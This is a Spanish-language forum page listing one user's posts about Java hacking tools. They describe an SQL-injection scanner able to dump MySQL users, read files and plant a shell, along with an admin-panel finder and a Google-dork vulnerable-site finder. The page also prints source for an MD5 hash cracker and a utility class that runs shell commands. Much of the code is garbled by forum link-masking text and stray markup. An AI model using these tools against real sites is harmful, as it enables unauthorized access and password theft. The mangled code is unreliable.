Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Temas - BigBear

Páginas: 1 2 [3] 4 5 ... 20
41
Java / [Java] K0bra 1.0
« en: Abril 01, 2016, 10:20:37 am »
Un simple scanner SQLI hecho en Java , tiene las siguientes funciones :

  • Comprobar vulnerabilidad[/li]
  • Buscar numero de columnas[/li]
  • Buscar automaticamente el numero para mostrar datos[/li]
  • Mostras tablas[/li]
  • Mostrar columnas[/li]
  • Mostrar bases de datos[/li]
  • Mostrar tablas de otra DB[/li]
  • Mostrar columnas de una tabla de otra DB[/li]
  • Mostrar usuarios de mysql.user[/li]
  • Buscar archivos usando load_file[/li]
  • Mostrar un archivo usando load_file[/li]
  • Mostrar valores[/li]
  • Mostrar informacion sobre la DB[/li]
  • Crear una shell usando outfile[/li]
  • Todo se guarda en logs ordenados[/li][/list]

    Unas imagenes :









    Si quieren bajar el proyecto con el codigo fuente lo pueden hacer desde You are not allowed to view links. Register or Login.

42
Java / [Java] PanelFinder 0.3
« en: Marzo 18, 2016, 10:41:37 am »
Traduccion a Java de este programa para buscar el panel de administracion de una pagina.

Una imagen :



Si quieren bajar el proyecto lo pueden hacer desde You are not allowed to view links. Register or Login.

43
Java / [Java] SQLI Scanner 0.4
« en: Marzo 05, 2016, 12:24:04 pm »
Un simple programa en Java para buscar paginas vulnerables a SQLI usando Google o Bing.

Una imagen :



Si lo quieren bajar el proyecto con el codigo fuente lo pueden hacer de You are not allowed to view links. Register or Login.

44
Java / [Java] LocateIP 0.2
« en: Febrero 20, 2016, 12:00:02 pm »
Un simple programa en Java para localizar una IP y sus DNS.

Una imagen :



Si quieren bajar el proyecto con el codigo y el programa final lo pueden hacer de You are not allowed to view links. Register or Login.

45
Java / [Java] MD5 Cracker 0.2
« en: Enero 22, 2016, 12:18:48 pm »
Un simple programa en Java para crackear un hash MD5 mediante 3 servicios online.

Una imagen :



El codigo :

Código: Java
  1. // MD5 Cracker 0.2
  2. // (C) Doddy Hackman 2015
  3. // Credits : Based in the services ...
  4. // [url]http://md5online.net/index.php[/url]
  5. // [url]http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php[/url]
  6. // [url]http://md5decryption.com/index.php[/url]
  7. package MD5_Cracker;
  8.  
  9. import java.util.regex.Matcher;
  10. import java.util.regex.Pattern;
  11. import javax.swing.JOptionPane;
  12. import javax.swing.SwingUtilities;
  13. import org.jvnet.substance.SubstanceLookAndFeel;
  14.  
  15. /**
  16.  *
  17.  * @author Doddy
  18.  */
  19. public class Home extends javax.swing.You are not allowed to view links. Register or Login {
  20.  
  21.     /**
  22.      * Creates new form Home
  23.      */
  24.     public Home() {
  25.         initComponents();
  26.     }
  27.  
  28.     /**
  29.      * This method is called from within the constructor to initialize the form.
  30.      * WARNING: Do NOT modify this code. The content of this method is always
  31.      * regenerated by the Form Editor.
  32.      */
  33.     @SuppressWarnings("unchecked")
  34.     // <editor-fold defaultstate="collapsed" desc="Generated Code">                          
  35.     private void initComponents() {
  36.  
  37.         jPanel3 = new javax.swing.You are not allowed to view links. Register or Login();
  38.         jPanel1 = new javax.swing.You are not allowed to view links. Register or Login();
  39.         txtMD5 = new javax.swing.You are not allowed to view links. Register or Login();
  40.         btnCrack = new javax.swing.You are not allowed to view links. Register or Login();
  41.         jPanel2 = new javax.swing.You are not allowed to view links. Register or Login();
  42.         jLabel1 = new javax.swing.You are not allowed to view links. Register or Login();
  43.         jLabel2 = new javax.swing.You are not allowed to view links. Register or Login();
  44.         jLabel3 = new javax.swing.You are not allowed to view links. Register or Login();
  45.         txtPassword1 = new javax.swing.You are not allowed to view links. Register or Login();
  46.         txtPassword2 = new javax.swing.You are not allowed to view links. Register or Login();
  47.         txtPassword3 = new javax.swing.You are not allowed to view links. Register or Login();
  48.         jPanel4 = new javax.swing.You are not allowed to view links. Register or Login();
  49.         status = new javax.swing.You are not allowed to view links. Register or Login();
  50.  
  51.         javax.swing.GroupLayout jPanel3Layout = new javax.swing.GroupLayout(jPanel3);
  52.         jPanel3.setLayout(jPanel3Layout);
  53.         jPanel3Layout.setHorizontalGroup(
  54.             jPanel3Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
  55.             .addGap(0, 100, You are not allowed to view links. Register or Login.MAX_VALUE)
  56.         );
  57.         jPanel3Layout.setVerticalGroup(
  58.             jPanel3Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
  59.             .addGap(0, 100, You are not allowed to view links. Register or Login.MAX_VALUE)
  60.         );
  61.  
  62.         setDefaultCloseOperation(javax.swing.You are not allowed to view links. Register or Login.EXIT_ON_CLOSE);
  63.         setTitle("MD5 Cracker 0.2 (C) Doddy Hackman 2015");
  64.         setResizable(false);
  65.  
  66.         jPanel1.setBorder(javax.swing.You are not allowed to view links. Register or Login.createTitledBorder(null, "Enter MD5", javax.swing.border.You are not allowed to view links. Register or Login.DEFAULT_JUSTIFICATION, javax.swing.border.You are not allowed to view links. Register or Login.TOP));
  67.  
  68.         btnCrack.setText("Crack");
  69.         btnCrack.addActionListener(new java.awt.event.You are not allowed to view links. Register or Login() {
  70.             public void actionPerformed(java.awt.event.You are not allowed to view links. Register or Login evt) {
  71.                 btnCrackActionPerformed(evt);
  72.             }
  73.         });
  74.  
  75.         javax.swing.GroupLayout jPanel1Layout = new javax.swing.GroupLayout(jPanel1);
  76.         jPanel1.setLayout(jPanel1Layout);
  77.         jPanel1Layout.setHorizontalGroup(
  78.             jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
  79.             .addGroup(jPanel1Layout.createSequentialGroup()
  80.                 .addContainerGap()
  81.                 .addComponent(txtMD5, javax.swing.GroupLayout.PREFERRED_SIZE, 280, javax.swing.GroupLayout.PREFERRED_SIZE)
  82.                 .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
  83.                 .addComponent(btnCrack, javax.swing.GroupLayout.DEFAULT_SIZE, 75, You are not allowed to view links. Register or Login.MAX_VALUE)
  84.                 .addContainerGap())
  85.         );
  86.         jPanel1Layout.setVerticalGroup(
  87.             jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
  88.             .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, jPanel1Layout.createSequentialGroup()
  89.                 .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, You are not allowed to view links. Register or Login.MAX_VALUE)
  90.                 .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
  91.                     .addComponent(txtMD5, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)
  92.                     .addComponent(btnCrack))
  93.                 .addContainerGap())
  94.         );
  95.  
  96.         jPanel2.setBorder(javax.swing.You are not allowed to view links. Register or Login.createTitledBorder(null, "Result", javax.swing.border.You are not allowed to view links. Register or Login.DEFAULT_JUSTIFICATION, javax.swing.border.You are not allowed to view links. Register or Login.TOP));
  97.  
  98.         jLabel1.setText("md5online.net ->");
  99.  
  100.         jLabel2.setText("md5.my-addr.co ->");
  101.  
  102.         jLabel3.setText("md5decryption.com ->");
  103.  
  104.         txtPassword1.setEditable(false);
  105.  
  106.         txtPassword2.setEditable(false);
  107.  
  108.         txtPassword3.setEditable(false);
  109.  
  110.         javax.swing.GroupLayout jPanel2Layout = new javax.swing.GroupLayout(jPanel2);
  111.         jPanel2.setLayout(jPanel2Layout);
  112.         jPanel2Layout.setHorizontalGroup(
  113.             jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
  114.             .addGroup(jPanel2Layout.createSequentialGroup()
  115.                 .addGap(28, 28, 28)
  116.                 .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING, false)
  117.                     .addGroup(jPanel2Layout.createSequentialGroup()
  118.                         .addComponent(jLabel3)
  119.                         .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)
  120.                         .addComponent(txtPassword3))
  121.                     .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, jPanel2Layout.createSequentialGroup()
  122.                         .addComponent(jLabel2)
  123.                         .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)
  124.                         .addComponent(txtPassword2))
  125.                     .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, jPanel2Layout.createSequentialGroup()
  126.                         .addComponent(jLabel1)
  127.                         .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)
  128.                         .addComponent(txtPassword1, javax.swing.GroupLayout.PREFERRED_SIZE, 229, javax.swing.GroupLayout.PREFERRED_SIZE)))
  129.                 .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, You are not allowed to view links. Register or Login.MAX_VALUE))
  130.         );
  131.         jPanel2Layout.setVerticalGroup(
  132.             jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
  133.             .addGroup(jPanel2Layout.createSequentialGroup()
  134.                 .addContainerGap()
  135.                 .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
  136.                     .addComponent(jLabel1)
  137.                     .addComponent(txtPassword1, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE))
  138.                 .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)
  139.                 .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
  140.                     .addComponent(jLabel2)
  141.                     .addComponent(txtPassword2, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE))
  142.                 .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)
  143.                 .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
  144.                     .addComponent(jLabel3)
  145.                     .addComponent(txtPassword3, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE))
  146.                 .addContainerGap(15, You are not allowed to view links. Register or Login.MAX_VALUE))
  147.         );
  148.  
  149.         jPanel4.setBorder(javax.swing.You are not allowed to view links. Register or Login.createBevelBorder(javax.swing.border.You are not allowed to view links. Register or Login.RAISED));
  150.  
  151.         status.setText("<ul class="bbc_list"><li type="square"> Program Ready");[/li][/list]
  152.  
  153.         javax.swing.GroupLayout jPanel4Layout = new javax.swing.GroupLayout(jPanel4);
  154.         jPanel4.setLayout(jPanel4Layout);
  155.         jPanel4Layout.setHorizontalGroup(
  156.             jPanel4Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
  157.             .addGroup(jPanel4Layout.createSequentialGroup()
  158.                 .addComponent(status)
  159.                 .addGap(0, 0, You are not allowed to view links. Register or Login.MAX_VALUE))
  160.         );
  161.         jPanel4Layout.setVerticalGroup(
  162.             jPanel4Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
  163.             .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, jPanel4Layout.createSequentialGroup()
  164.                 .addGap(0, 0, You are not allowed to view links. Register or Login.MAX_VALUE)
  165.                 .addComponent(status))
  166.         );
  167.  
  168.         javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane());
  169.         getContentPane().setLayout(layout);
  170.         layout.setHorizontalGroup(
  171.             layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
  172.             .addGroup(layout.createSequentialGroup()
  173.                 .addContainerGap()
  174.                 .addGroup(layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
  175.                     .addComponent(jPanel2, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, You are not allowed to view links. Register or Login.MAX_VALUE)
  176.                     .addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, You are not allowed to view links. Register or Login.MAX_VALUE))
  177.                 .addContainerGap())
  178.             .addComponent(jPanel4, javax.swing.GroupLayout.Alignment.TRAILING, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, You are not allowed to view links. Register or Login.MAX_VALUE)
  179.         );
  180.         layout.setVerticalGroup(
  181.             layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
  182.             .addGroup(layout.createSequentialGroup()
  183.                 .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, You are not allowed to view links. Register or Login.MAX_VALUE)
  184.                 .addComponent(jPanel1, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)
  185.                 .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
  186.                 .addComponent(jPanel2, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)
  187.                 .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
  188.                 .addComponent(jPanel4, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)
  189.                 .addGap(0, 0, 0))
  190.         );
  191.  
  192.         pack();
  193.     }// </editor-fold>                        
  194.  
  195.     private void btnCrackActionPerformed(java.awt.event.You are not allowed to view links. Register or Login evt) {                                        
  196.  
  197.         DH_Tools tools = new DH_Tools();
  198.  
  199.         if ("".equals(txtMD5.getText())) {
  200.             You are not allowed to view links. Register or Login.showMessageDialog(null, "Write MD5");
  201.         } else {
  202.  
  203.             You are not allowed to view links. Register or Login.updateComponentTreeUI(this);
  204.             status.setText("</li><li type="square"> Cracking ...");[/li][/list]
  205.  
  206.             You are not allowed to view links. Register or Login md5 = txtMD5.getText();
  207.  
  208.             You are not allowed to view links. Register or Login code1 = tools.tomar("[url]http://md5online.net/index.php[/url]", "pass=" + md5 + "&option=hash2text&send=Submit");
  209.  
  210.             Pattern search = null;
  211.             Matcher regex = null;
  212.  
  213.             search = Pattern.compile("pass : <b>(.*?)<\\/b>");
  214.             regex = search.matcher(code1);
  215.             if (regex.find()) {
  216.                 txtPassword1.setText(regex.group(1));
  217.             } else {
  218.                 txtPassword1.setText("Not Found");
  219.             }
  220.  
  221.             You are not allowed to view links. Register or Login code2 = tools.tomar("[url]http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php[/url]", "md5=" + md5);
  222.  
  223.             search = Pattern.compile("<span class='middle_title'>Hashed string<\\/span>: (.*?)<\\/div>");
  224.             regex = search.matcher(code2);
  225.             if (regex.find()) {
  226.                 txtPassword2.setText(regex.group(1));
  227.             } else {
  228.                 txtPassword2.setText("Not Found");
  229.             }
  230.  
  231.             You are not allowed to view links. Register or Login code3 = tools.tomar("[url]http://md5decryption.com/index.php[/url]", "hash=" + md5 + "&submit=Decrypt It!");
  232.  
  233.             search = Pattern.compile("Decrypted Text: <\\/b>(.*?)<\\/font>");
  234.             regex = search.matcher(code3);
  235.             if (regex.find()) {
  236.                 txtPassword3.setText(regex.group(1));
  237.             } else {
  238.                 txtPassword3.setText("Not Found");
  239.             }
  240.  
  241.             You are not allowed to view links. Register or Login.updateComponentTreeUI(this);
  242.             status.setText("</li><li type="square"> Finished");[/li][/list]
  243.  
  244.         }
  245.  
  246.  
  247.     }                                        
  248.  
  249.     /**
  250.      * @param args the command line arguments
  251.      */
  252.     public static void main(You are not allowed to view links. Register or Login args[]) {
  253.         /* Set the Nimbus look and feel */
  254.         //<editor-fold defaultstate="collapsed" desc=" Look and feel setting code (optional) ">
  255.         /* If Nimbus (introduced in Java SE 6) is not available, stay with the default look and feel.
  256.          * For details see [url]http://download.oracle.com/javase/tutorial/uiswing/lookandfeel/plaf.html[/url]
  257.          */
  258.         try {
  259.             for (javax.swing.You are not allowed to view links. Register or Login info : javax.swing.You are not allowed to view links. Register or Login.getInstalledLookAndFeels()) {
  260.                 if ("Nimbus".equals(info.getName())) {
  261.                     javax.swing.You are not allowed to view links. Register or Login.setLookAndFeel(info.getClassName());
  262.                     break;
  263.                 }
  264.             }
  265.         } catch (You are not allowed to view links. Register or Login ex) {
  266.             java.util.logging.Logger.getLogger(Home.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
  267.         } catch (You are not allowed to view links. Register or Login ex) {
  268.             java.util.logging.Logger.getLogger(Home.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
  269.         } catch (You are not allowed to view links. Register or Login ex) {
  270.             java.util.logging.Logger.getLogger(Home.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
  271.         } catch (javax.swing.You are not allowed to view links. Register or Login ex) {
  272.             java.util.logging.Logger.getLogger(Home.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
  273.         }
  274.         //</editor-fold>
  275.  
  276.         /* Create and display the form */
  277.         Home.setDefaultLookAndFeelDecorated(true);
  278.         You are not allowed to view links. Register or Login skin = "org.jvnet.substance.skin.RavenGraphiteGlassSkin";
  279.         SubstanceLookAndFeel.setSkin(skin);
  280.         SubstanceLookAndFeel.setCurrentWatermark("org.jvnet.substance.watermark.SubstanceMetalWallWatermark");
  281.  
  282.         java.awt.You are not allowed to view links. Register or Login.invokeLater(new You are not allowed to view links. Register or Login() {
  283.             public void run() {
  284.                 new Home().setVisible(true);
  285.             }
  286.         });
  287.     }
  288.  
  289.     // Variables declaration - do not modify                    
  290.     private javax.swing.You are not allowed to view links. Register or Login btnCrack;
  291.     private javax.swing.You are not allowed to view links. Register or Login jLabel1;
  292.     private javax.swing.You are not allowed to view links. Register or Login jLabel2;
  293.     private javax.swing.You are not allowed to view links. Register or Login jLabel3;
  294.     private javax.swing.You are not allowed to view links. Register or Login jPanel1;
  295.     private javax.swing.You are not allowed to view links. Register or Login jPanel2;
  296.     private javax.swing.You are not allowed to view links. Register or Login jPanel3;
  297.     private javax.swing.You are not allowed to view links. Register or Login jPanel4;
  298.     private javax.swing.You are not allowed to view links. Register or Login status;
  299.     private javax.swing.You are not allowed to view links. Register or Login txtMD5;
  300.     private javax.swing.You are not allowed to view links. Register or Login txtPassword1;
  301.     private javax.swing.You are not allowed to view links. Register or Login txtPassword2;
  302.     private javax.swing.You are not allowed to view links. Register or Login txtPassword3;
  303.     // End of variables declaration                  
  304. }
  305.  
  306. // The End ?
  307.  

Si quieren bajar el programa lo pueden hacer de You are not allowed to view links. Register or Login.

46
Java / [Java] Class DH Tools 0.2
« en: Enero 15, 2016, 12:22:38 pm »
Mi primer clase en Java , se llama DH Tools y tiene las siguientes opciones :

  • Realizar una peticion GET y guardar el contenido[/li]
  • Realizar una peticion POST y guardar el contenido[/li]
  • Crear o escribir archivos[/li]
  • Leer archivos[/li]
  • Ejecutar comandos y leer su respuesta[/li]
  • HTTP FingerPrinting[/li]
  • Leer el codigo de respuesta de una URL[/li]
  • Borrar repetidos en un ArrayList[/li]
  • Cortar las URL en un ArrayList a partir del query[/li]
  • Split casero xD[/li]
  • Descargar archivos[/li]
  • Capturar el archivo de una URL[/li]
  • URI Split[/li]
  • MD5 Encode[/li]
  • MD5 File[/li]
  • Get IP[/li][/list]

    El codigo de la clase :

    Código: Java
    1. // Class : DH Tools
    2. // Version : 0.2
    3. // (C) Doddy Hackman 2015
    4. // Functions :
    5. //
    6. //public String toma(String link)
    7. //public String tomar(String pagina, String data)
    8. //public void savefile(String ruta, String texto)
    9. //public String read_file(String ruta)
    10. //public String console(String command)
    11. //public String httpfinger(String target)
    12. //public Integer response_code(String page)
    13. //public ArrayList repes(ArrayList array)
    14. //public ArrayList cortar(ArrayList array)
    15. //public String regex(String code, String deaca, String hastaaca)
    16. //public Boolean download(String url, File savefile)
    17. //public String extract_file_by_url(String url)
    18. //public String uri_split(String link, String opcion)
    19. //public String md5_encode(String text)
    20. //public String md5_file(String file)
    21. //public String get_ip(String hostname)
    22. //
    23. package dhtools;
    24.  
    25. import java.io.*;
    26. import java.net.*;
    27. import java.nio.channels.Channels;
    28. import java.nio.channels.ReadableByteChannel;
    29. import java.util.ArrayList;
    30. import java.util.Scanner;
    31. import java.util.regex.Matcher;
    32. import java.util.regex.Pattern;
    33. import java.security.*;
    34.  
    35. public class DH_Tools {
    36.  
    37.     public You are not allowed to view links. Register or Login toma(You are not allowed to view links. Register or Login link) {
    38.         You are not allowed to view links. Register or Login re;
    39.         You are not allowed to view links. Register or Login conte = new You are not allowed to view links. Register or Login(40);
    40.         try {
    41.             You are not allowed to view links. Register or Login url = new You are not allowed to view links. Register or Login(link);
    42.             You are not allowed to view links. Register or Login nave = url.openConnection();
    43.             nave.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0");
    44.             You are not allowed to view links. Register or Login leyendo = new You are not allowed to view links. Register or Login(
    45.                     new You are not allowed to view links. Register or Login(nave.getInputStream()));
    46.             while ((re = leyendo.readLine()) != null) {
    47.                 conte.append(re);
    48.             }
    49.             leyendo.close();
    50.         } catch (You are not allowed to view links. Register or Login e) {
    51.             //
    52.         }
    53.         return conte.toString();
    54.     }
    55.  
    56.     public You are not allowed to view links. Register or Login tomar(You are not allowed to view links. Register or Login pagina, You are not allowed to view links. Register or Login data) {
    57.         // Credits : Function based in [url]http://www.mkyong.com/java/how-to-send-http-request-getpost-in-java/[/url]
    58.         You are not allowed to view links. Register or Login respuesta = "";
    59.  
    60.         try {
    61.             You are not allowed to view links. Register or Login url_now = new You are not allowed to view links. Register or Login(pagina);
    62.             You are not allowed to view links. Register or Login nave = (You are not allowed to view links. Register or Login) url_now.openConnection();
    63.  
    64.             nave.setRequestMethod("POST");
    65.             nave.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0");
    66.  
    67.             nave.setDoOutput(true);
    68.             You are not allowed to view links. Register or Login send = new You are not allowed to view links. Register or Login(nave.getOutputStream());
    69.             send.writeBytes(data);
    70.             send.flush();
    71.             send.close();
    72.  
    73.             You are not allowed to view links. Register or Login leyendo = new You are not allowed to view links. Register or Login(new You are not allowed to view links. Register or Login(nave.getInputStream()));
    74.             You are not allowed to view links. Register or Login code = new You are not allowed to view links. Register or Login();
    75.             You are not allowed to view links. Register or Login linea;
    76.  
    77.             while ((linea = leyendo.readLine()) != null) {
    78.                 code.append(linea);
    79.             }
    80.             leyendo.close();
    81.             respuesta = code.toString();
    82.         } catch (You are not allowed to view links. Register or Login e) {
    83.             //
    84.         }
    85.         return respuesta;
    86.     }
    87.  
    88.     public void savefile(You are not allowed to view links. Register or Login ruta, You are not allowed to view links. Register or Login texto) {
    89.  
    90.         You are not allowed to view links. Register or Login escribir = null;
    91.         You are not allowed to view links. Register or Login archivo = null;
    92.  
    93.         try {
    94.  
    95.             archivo = new You are not allowed to view links. Register or Login(ruta);
    96.  
    97.             if (!archivo.exists()) {
    98.                 archivo.createNewFile();
    99.             }
    100.  
    101.             escribir = new You are not allowed to view links. Register or Login(archivo, true);
    102.             escribir.write(texto);
    103.             escribir.flush();
    104.             escribir.close();
    105.  
    106.         } catch (You are not allowed to view links. Register or Login e) {
    107.             //
    108.         }
    109.     }
    110.  
    111.     public You are not allowed to view links. Register or Login read_file(You are not allowed to view links. Register or Login ruta) {
    112.         You are not allowed to view links. Register or Login contenido = null;
    113.         try {
    114.             Scanner leyendo = new Scanner(new You are not allowed to view links. Register or Login(ruta));
    115.             contenido = leyendo.next();
    116.         } catch (You are not allowed to view links. Register or Login e) {
    117.             //
    118.         }
    119.         return contenido;
    120.     }
    121.  
    122.     public You are not allowed to view links. Register or Login console(You are not allowed to view links. Register or Login command) {
    123.         You are not allowed to view links. Register or Login contenido = null;
    124.         try {
    125.             You are not allowed to view links. Register or Login proceso = You are not allowed to view links. Register or Login.getRuntime().exec("cmd /c " + command);
    126.             proceso.waitFor();
    127.             You are not allowed to view links. Register or Login leyendo = new You are not allowed to view links. Register or Login(
    128.                     new You are not allowed to view links. Register or Login(proceso.getInputStream()));
    129.             You are not allowed to view links. Register or Login linea;
    130.             You are not allowed to view links. Register or Login code = new You are not allowed to view links. Register or Login();
    131.             while ((linea = leyendo.readLine()) != null) {
    132.                 code.append(linea);
    133.             }
    134.             contenido = code.toString();
    135.         } catch (You are not allowed to view links. Register or Login e) {
    136.             //
    137.         }
    138.         return contenido;
    139.     }
    140.  
    141.     public You are not allowed to view links. Register or Login httpfinger(You are not allowed to view links. Register or Login target) {
    142.  
    143.         You are not allowed to view links. Register or Login resultado = "";
    144.  
    145.         //http://www.mkyong.com/java/how-to-get-http-response-header-in-java/
    146.         try {
    147.  
    148.             You are not allowed to view links. Register or Login page = new You are not allowed to view links. Register or Login(target);
    149.             You are not allowed to view links. Register or Login nave = page.openConnection();
    150.  
    151.             You are not allowed to view links. Register or Login server = nave.getHeaderField("Server");
    152.             You are not allowed to view links. Register or Login etag = nave.getHeaderField("ETag");
    153.             You are not allowed to view links. Register or Login content_length = nave.getHeaderField("Content-Length");
    154.             You are not allowed to view links. Register or Login expires = nave.getHeaderField("Expires");
    155.             You are not allowed to view links. Register or Login last_modified = nave.getHeaderField("Last-Modified");
    156.             You are not allowed to view links. Register or Login connection = nave.getHeaderField("Connection");
    157.             You are not allowed to view links. Register or Login powered = nave.getHeaderField("X-Powered-By");
    158.             You are not allowed to view links. Register or Login pragma = nave.getHeaderField("Pragma");
    159.             You are not allowed to view links. Register or Login cache_control = nave.getHeaderField("Cache-Control");
    160.             You are not allowed to view links. Register or Login date = nave.getHeaderField("Date");
    161.             You are not allowed to view links. Register or Login vary = nave.getHeaderField("Vary");
    162.             You are not allowed to view links. Register or Login content_type = nave.getHeaderField("Content-Type");
    163.             You are not allowed to view links. Register or Login accept_ranges = nave.getHeaderField("Accept-Ranges");
    164.  
    165.             if (server != null) {
    166.                 resultado += "</li><li type="square"> Server : " + server + "\n";[/li][/list]
    167.             }
    168.             if (etag != null) {
    169.                 resultado += "</li><li type="square"> E-tag : " + etag + "\n";[/li][/list]
    170.             }
    171.             if (content_length != null) {
    172.                 resultado += "</li><li type="square"> Content-Length : " + content_length + "\n";[/li][/list]
    173.             }
    174.  
    175.             if (expires != null) {
    176.                 resultado += "</li><li type="square"> Expires : " + expires + "\n";[/li][/list]
    177.             }
    178.  
    179.             if (last_modified != null) {
    180.                 resultado += "</li><li type="square"> Last Modified : " + last_modified + "\n";[/li][/list]
    181.             }
    182.  
    183.             if (connection != null) {
    184.                 resultado += "</li><li type="square"> Connection : " + connection + "\n";[/li][/list]
    185.             }
    186.  
    187.             if (powered != null) {
    188.                 resultado += "</li><li type="square"> Powered : " + powered + "\n";[/li][/list]
    189.             }
    190.  
    191.             if (pragma != null) {
    192.                 resultado += "</li><li type="square"> Pragma : " + pragma + "\n";[/li][/list]
    193.             }
    194.  
    195.             if (cache_control != null) {
    196.                 resultado += "</li><li type="square"> Cache control : " + cache_control + "\n";[/li][/list]
    197.             }
    198.  
    199.             if (date != null) {
    200.                 resultado += "</li><li type="square"> Date : " + date + "\n";[/li][/list]
    201.             }
    202.             if (vary != null) {
    203.                 resultado += "</li><li type="square"> Vary : " + vary + "\n";[/li][/list]
    204.             }
    205.             if (content_type != null) {
    206.                 resultado += "</li><li type="square"> Content-Type : " + content_type + "\n";[/li][/list]
    207.             }
    208.             if (accept_ranges != null) {
    209.                 resultado += "</li><li type="square"> Accept Ranges : " + accept_ranges + "\n";[/li][/list]
    210.             }
    211.  
    212.         } catch (You are not allowed to view links. Register or Login e) {
    213.             //
    214.         }
    215.  
    216.         return resultado;
    217.  
    218.     }
    219.  
    220.     public You are not allowed to view links. Register or Login response_code(You are not allowed to view links. Register or Login page) {
    221.         You are not allowed to view links. Register or Login response = 0;
    222.         try {
    223.             You are not allowed to view links. Register or Login url = new You are not allowed to view links. Register or Login(page);
    224.             You are not allowed to view links. Register or Login nave1 = url.openConnection();
    225.             You are not allowed to view links. Register or Login nave2 = (You are not allowed to view links. Register or Login) nave1;
    226.             nave2.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0");
    227.             response = nave2.getResponseCode();
    228.         } catch (You are not allowed to view links. Register or Login e) {
    229.             response = 404;
    230.         }
    231.         return response;
    232.     }
    233.  
    234.     public You are not allowed to view links. Register or Login repes(You are not allowed to view links. Register or Login array) {
    235.         You are not allowed to view links. Register or Login[] listando = array.toArray();
    236.         for (You are not allowed to view links. Register or Login item : listando) {
    237.             if (array.indexOf(item) != array.lastIndexOf(item)) {
    238.                 array.remove(array.lastIndexOf(item));
    239.             }
    240.         }
    241.         return array;
    242.     }
    243.  
    244.     public You are not allowed to view links. Register or Login cortar(You are not allowed to view links. Register or Login array) {
    245.         You are not allowed to view links. Register or Login array2 = new You are not allowed to view links. Register or Login();
    246.         for (int i = 0; i < array.size(); i++) {
    247.             You are not allowed to view links. Register or Login code = (You are not allowed to view links. Register or Login) array.get(i);
    248.             Pattern regex1 = null;
    249.             Matcher regex2 = null;
    250.             regex1 = Pattern.compile("(.*?)=(.*?)");
    251.             regex2 = regex1.matcher(code);
    252.             if (regex2.find()) {
    253.                 array2.add(regex2.group(1) + "=");
    254.             }
    255.         }
    256.         return array2;
    257.     }
    258.  
